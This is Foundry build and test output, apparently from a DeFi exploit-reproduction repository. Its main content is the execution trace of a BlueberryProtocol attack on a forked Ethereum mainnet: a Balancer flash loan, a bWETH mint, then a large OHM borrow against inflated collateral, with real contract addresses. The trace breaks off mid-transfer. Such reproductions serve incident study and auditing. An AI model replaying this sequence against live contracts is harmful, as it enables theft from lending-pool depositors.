Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.33s
Compiler run successful with warnings:
Warning (3420): Source file does not specify required compiler version! Consider adding "pragma solidity ^0.8.28;"
--> src/test/2024-02/BlueberryProtocol_exp.sol

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/BlueberryProtocol_exp.sol:45:5:
   |
45 |     WETH9 private WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/BlueberryProtocol_exp.sol:47:5:
   |
47 |     IERC20 private USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/BlueberryProtocol_exp.sol:96:9:
   |
96 |         IERC20[] memory tokens,
   |         ^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/BlueberryProtocol_exp.sol:97:9:
   |
97 |         uint256[] memory amounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/BlueberryProtocol_exp.sol:98:9:
   |
98 |         uint256[] memory feeAmounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/BlueberryProtocol_exp.sol:99:9:
   |
99 |         bytes memory userData
   |         ^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.20s (1.94ms CPU time)

Ran 1 test for src/test/2024-02/BlueberryProtocol_exp.sol:ContractTest
[PASS] testAttack() (gas: 1518162)
Traces:
  [35863] AttackContract::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19287288 [1.928e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], "AttackContract")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5], "OHM")
    │   └─ ← [Return]
    ├─ [0] VM::label(USDC: [0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(WBTC: [0x2260FAC5E5542a773Aa44fBCfeDf7C193bc2C599], "WBTC")
    │   └─ ← [Return]
    ├─ [0] VM::label(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], "bWETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c], "bOHM")
    │   └─ ← [Return]
    ├─ [0] VM::label(bUSDC: [0x649127D0800a8c68290129F091564aD2F1D62De1], "bUSDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(bWBTC: [0xE61ad5B0E40c856E6C193120Bd3fa28A432911B6], "bWBTC")
    │   └─ ← [Return]
    ├─ [0] VM::label(BlueberryProtocol: [0xfFadB0bbA4379dFAbFB20CA6823F6EC439429ec2], "BlueberryProtocol")
    │   └─ ← [Return]
    ├─ [0] VM::label(balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], "balancer")
    │   └─ ← [Return]
    ├─ [0] VM::label(pool: [0xE592427A0AEce92De3Edee1F18E0157C05861564], "pool")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1566562] AttackContract::testAttack()
    ├─ [0] VM::deal(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9997)
    │   └─ ← [Return]
    ├─ [23974] WETH::deposit{value: 9997}()
    │   ├─ emit Deposit(dst: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 9997)
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 9997
    │   └─ ← [Stop]
    ├─ [24420] WETH::approve(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0xc085524f9bd4a7dc8fe274b0ebe6f42507d13f43d91c17b29f1991fe5f697f83: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24535] OHM::approve(pool: [0xE592427A0AEce92De3Edee1F18E0157C05861564], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: pool: [0xE592427A0AEce92De3Edee1F18E0157C05861564], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x3654df304856564dc45cce134cd99fc8d2840bf25390d9edea6d987fe01af77f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [1460074] balancer::flashLoan(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [1000000000000000000 [1e18]], 0x00)
    │   ├─ [2534] WETH::balanceOf(balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 55264633359662360756107 [5.526e22]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [6062] WETH::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   │   ├─ emit Transfer(from: balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1000000000000000000 [1e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 9997 → 0x0000000000000000000000000000000000000000000000000de0b6b3a764270d
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000bb3e6dae4094d92ff8b → 0x000000000000000000000000000000000000000000000bb3d8fa2d55a62eff8b
    │   │   └─ ← [Return] true
    │   ├─ [1430582] AttackContract::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [1000000000000000000 [1e18]], [0], 0x00)
    │   │   ├─ [73850] BlueberryProtocol::enterMarkets([0x643d448CEa0D3616F0b32E3718F563b164e7eDd2])
    │   │   │   ├─ emit MarketEntered(rToken: bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], account: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc4acd6b76953256ea175176907a199509abb963764d02e44d62f5d73ea6112ad: 0 → 1
    │   │   │   │   @ 0x86581590abc6f15fce38bf279cf1cbd925284db42a8dc4adfd579fead3ff779b: 0 → 0x000000000000000000000000643d448cea0d3616f0b32e3718f563b164e7edd2
    │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 0 → 1
    │   │   │   └─ ← [Return] [0]
    │   │   ├─ [181370] bWETH::mint(1000000000000000000 [1e18])
    │   │   │   ├─ [175999] 0x3eEDb4396387032F03d04Fd0DB1887f6B76d7BFA::mint(1000000000000000000 [1e18]) [delegatecall]
    │   │   │   │   ├─ [7127] 0xC82151fc8C8f4c8042beea293FeAb8764221d7fD::getBorrowRate(315207249610134092750 [3.152e20], 0, 0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 315207249610134092750 [3.152e20], interestAccumulated: 0, borrowIndex: 1000000000000000000 [1e18], totalBorrows: 0)
    │   │   │   │   ├─ [662] BlueberryProtocol::checkMembership(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit UserCollateralChanged(: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0)
    │   │   │   │   ├─ [7416] BlueberryProtocol::mintAllowed(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18])
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [2534] WETH::balanceOf(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 315207249610134092750 [3.152e20]
    │   │   │   │   ├─ [6225] WETH::transferFrom(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], 1000000000000000000 [1e18])
    │   │   │   │   │   ├─ emit Transfer(from: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], value: 1000000000000000000 [1e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf5c5893ba3d14221967ba12ba495d046986ac5f29623b0ed956d5761dfbc15b5: 0x00000000000000000000000000000000000000000000001116611b7b17ed7bce → 0x0000000000000000000000000000000000000000000000112441d22ebf517bce
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000de0b6b3a764270d → 9997
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] WETH::balanceOf(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 316207249610134092750 [3.162e20]
    │   │   │   │   ├─ [662] BlueberryProtocol::checkMembership(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ emit UserCollateralChanged(: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 9999999999 [9.999e9])
    │   │   │   │   ├─ emit Mint(minter: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], mintAmount: 1000000000000000000 [1e18], mintTokens: 9999999999 [9.999e9])
    │   │   │   │   ├─ emit Transfer(from: bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9999999999 [9.999e9])
    │   │   │   │   ├─ [360] BlueberryProtocol::mintVerify(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1000000000000000000 [1e18], 9999999999 [9.999e9])
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 19: 0x00000000000000000000000000000000000000000000001116611b7b17ed7bce → 0x0000000000000000000000000000000000000000000000112441d22ebf517bce
    │   │   │   │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 0x00000000000000000000000000000000000000000000000000000002540be3ff
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000065d73e17 → 0x0000000000000000000000000000000000000000000000000000000065d80147
    │   │   │   │   │   @ 0x755303852e9d37ba89f8d7ed329dac976d9b4e2d10c29c8c06b3e8c55a8b25d6: 0 → 0x00000000000000000000000000000000000000000000000000000002540be3ff
    │   │   │   │   │   @ 20: 0 → 0x00000000000000000000000000000000000000000000000000000002540be3ff
    │   │   │   │   │   @ 0xf5c5893ba3d14221967ba12ba495d046986ac5f29623b0ed956d5761dfbc15b5: 0x00000000000000000000000000000000000000000000001116611b7b17ed7bce → 0x0000000000000000000000000000000000000000000000112441d22ebf517bce
    │   │   │   │   │   @ 0x21284a7e3d76be98b82878f06f62c3846b9cfd0a98b63099a707264e9650f639: 0 → 1
    │   │   │   │   │   @ 13: 0x000000000000000000000000000000000000000000000000000002dde629539c → 0x000000000000000000000000000000000000000000000000000002e03a35379b
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [359249] bOHM::borrow(8616071267266 [8.616e12])
    │   │   │   ├─ [353945] 0xba4aB7577d4B4D4a4E9Fad4dc40564C6E5c9e365::borrow(8616071267266 [8.616e12]) [delegatecall]
    │   │   │   │   ├─ [7127] 0x04C5e346Ee1ED50726B8452362A1C8C003abd26E::getBorrowRate(8616071267266 [8.616e12], 0, 0) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─ emit AccrueInterest(cashPrior: 8616071267266 [8.616e12], interestAccumulated: 0, borrowIndex: 1000000000000000000 [1e18], totalBorrows: 0)
    │   │   │   │   ├─ [212224] BlueberryProtocol::borrowAllowed(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c], AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8616071267266 [8.616e12])
    │   │   │   │   │   ├─ emit MarketEntered(rToken: bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c], account: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [77227] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c]) [staticcall]
    │   │   │   │   │   │   ├─ [2448] bOHM::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]
    │   │   │   │   │   │   ├─ [69085] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   ├─ [64137] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [56426] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [51478] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [15643] 0x9a72298ae3886221820B1c878d12D872087D3a23::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [7410] 0x9Aae856973A0Cafa084b82F7BC4C6C2893A9139b::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2282, 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 2282
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709553898 [1.844e19], 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 18446744073709553898 [1.844e19]
    │   │   │   │   │   │   │   │   │   │   ├─ [15735] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [7502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   └─ ← [Return] 12774830590457521373 [1.277e19]
    │   │   │   │   │   ├─ [8029] bWETH::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [6526] bWETH::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [4641] 0x3eEDb4396387032F03d04Fd0DB1887f6B76d7BFA::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 9999999999 [9.999e9], 0, 100000000002351019073516055 [1e26]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002540be3ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000052b7d2dcd067102cbcb217
    │   │   │   │   │   │   └─ ← [Return] 0, 9999999999 [9.999e9], 0, 100000000002351019073516055 [1e26]
    │   │   │   │   │   ├─ [17916] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bWETH: [0x643d448CEa0D3616F0b32E3718F563b164e7eDd2]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bWETH::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   │   │   │   ├─ [16274] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   │   ├─ [15826] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [12615] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [12167] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000a1acd8bec2a90c3800
    │   │   │   │   │   │   └─ ← [Return] 2982380710380000000000 [2.982e21]
    │   │   │   │   │   ├─ [14030] bOHM::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   ├─ [12527] bOHM::delegateToImplementation(0xc37f68e20000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496) [staticcall]
    │   │   │   │   │   │   │   ├─ [10642] 0xba4aB7577d4B4D4a4E9Fad4dc40564C6E5c9e365::getAccountSnapshot(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 100000000000000000 [1e17]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   │   │   │   │   └─ ← [Return] 0, 0, 0, 100000000000000000 [1e17]
    │   │   │   │   │   ├─ [15227] 0x16D43cAC32329ec286Dc14431e0c0E805e6F5174::getUnderlyingPrice(bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c]) [staticcall]
    │   │   │   │   │   │   ├─ [448] bOHM::underlying() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]
    │   │   │   │   │   │   ├─ [13585] 0xdfe469ACe05C3d0D4461439e6cF5d0f46F33Ec56::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   ├─ [13137] 0x770d3E22703210c09A573c2043081D97286F415E::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [11926] 0xC5CEa3f9C92291335076D4C2eC6Ae72E45Fb8937::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [11478] 0x5818562bAAC907b859e27813e8c0962d416DAB59::getPrice(OHM: [0x64aa3364F17a4D01c6f1751Fd97C2BD3D7e7f1D5]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [3143] 0x9a72298ae3886221820B1c878d12D872087D3a23::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1410] 0x9Aae856973A0Cafa084b82F7BC4C6C2893A9139b::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 2282, 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 2282
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709553898 [1.844e19], 4283433884210516 [4.283e15], 1708588835 [1.708e9], 1708588835 [1.708e9], 18446744073709553898 [1.844e19]
    │   │   │   │   │   │   │   │   │   │   ├─ [3235] 0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   ├─ [1502] 0xE62B71cf983019BFf55bC83B48601ce8419650CC::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 12117 [1.211e4], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 12117 [1.211e4]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 110680464442257321813 [1.106e20], 298238071038 [2.982e11], 1708653335 [1.708e9], 1708653335 [1.708e9], 110680464442257321813 [1.106e20]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000b14950bcf203a4dd
    │   │   │   │   │   │   └─ ← [Return] 12774830590457521373 [1.277e19]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x886d4c174550580649b8704a29f4e530ea30907e013a197e245876e1659cdf56: 0 → 1
    │   │   │   │   │   │   @ 0x86581590abc6f15fce38bf279cf1cbd925284db42a8dc4adfd579fead3ff779c: 0 → 0x00000000000000000000000008830038a6097c10f4a814274d5a68e64648d91c
    │   │   │   │   │   │   @ 0x5223e63f0507f82c7e25e324cdfe3030bae704b36135ec7694b55330a3b5b731: 1 → 2
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [29996] OHM::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8616071267266 [8.616e12])
    │   │   │   │   │   ├─ emit Transfer(from: bOHM: [0x08830038A6097C10f4A814274d5A68E64648d91c], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 8616071267266 [8.616e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000000000000007d615de03c2
    │   │   │   │   │   │   @ 0xf75b4d99076083c7021abc02a08443edea94374a74d30972d2e41751a9a06ec1: 0x000000000000000000000000000000000000000000000000000007d615de03c2 → 0
